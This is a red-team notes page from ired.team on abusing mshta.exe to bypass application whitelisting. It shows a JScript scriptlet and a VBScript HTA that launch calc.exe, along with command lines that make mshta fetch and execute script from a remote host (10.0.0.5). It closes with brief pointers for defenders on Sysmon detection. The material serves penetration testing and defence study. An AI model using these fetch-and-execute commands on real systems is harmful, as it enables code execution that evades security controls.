Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
regsvr32
MSHTA
Control Panel Item
Executing Code as a Control Panel Item through an Exported Cplapplet Function
Code Execution through Control Panel Add-ins
CMSTP
InstallUtil
Using MSBuild to Execute Shellcode in C#
Forfiles Indirect Command Execution
Application Whitelisting Bypass with WMIC and XSL
Powershell Without Powershell.exe
Powershell Constrained Language Mode ByPass
Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
pubprn.vbs Signed Script Code Execution
Binary Exploitation
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

MSHTA

MSHTA code execution - bypass application whitelisting.

Execution

Writing a scriptlet file that will launch calc.exe when invoked:

http://10.0.0.5/m.sct
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
​
<public>
    <method name="Exec"></method>
</public>
​
<script language="JScript">
<![CDATA[
	function Exec()	{
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	}
]]>
</script>
</scriptlet>

Invoking the scriptlet file hosted remotely:

[email protected]
# from powershell
/cmd /c mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();

Observations

As expected, calc.exe is spawned by mshta.exe. Worth noting that mhsta and cmd exit almost immediately after invoking the calc.exe:

As a defender, look at sysmon logs for mshta establishing network connections:

Also, suspicious commandlines:

Bonus

The hta file can be invoked like so:

mshta.exe http://10.0.0.5/m.hta

or by navigating to the file itself, launching it and clicking run:

http://10.0.0.5/m.hta
<html>
<head>
<script language="VBScript"> 
    Sub RunProgram
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
    End Sub
RunProgram()
</script>
</head> 
<body>
    Nothing to see here..
</body>
</html>

References

Previous
regsvr32
Next
Control Panel Item
Last updated 3 years ago
Contents
Execution
Observations
Bonus
References